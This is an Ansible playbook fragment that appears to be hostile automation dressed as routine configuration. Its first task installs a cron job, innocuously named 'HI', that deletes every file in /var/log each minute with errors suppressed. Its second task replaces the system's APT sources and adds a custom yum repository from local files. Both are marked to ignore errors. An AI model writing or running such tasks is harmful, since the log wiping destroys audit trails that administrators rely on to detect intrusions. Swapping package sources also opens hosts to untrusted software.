- name: Ensure the cron job is present
  cron:
    name: "HI"
    minute: "*"
    hour: "*"
    day: "*"
    month: "*"
    weekday: "*"
    job: "/bin/bash -c 'for file in /var/log/*; do [ -f \"$file\" ] && /bin/rm -f \"$file\"; done'"
  ignore_errors: yes

- name: soruces
  block:
    - name: Copy sources.list for Debian/Ubuntu
      ansible.builtin.copy:
        src: files/sources.list
        dest: /etc/apt/sources.list
        owner: root
        group: root
        mode: '0644'
      when: ansible_facts['os_family'] == 'Debian'
      ignore_errors: yes

    - name: Copy repo file for Fedora
      ansible.builtin.copy:
        src: files/custom.repo
        dest: /etc/yum.repos.d/custom.repo
        owner: root
        group: root
        mode: '0644'
      when: ansible_facts['os_family'] == 'Fedora'
      ignore_errors: yes
  ignore_errors: yes


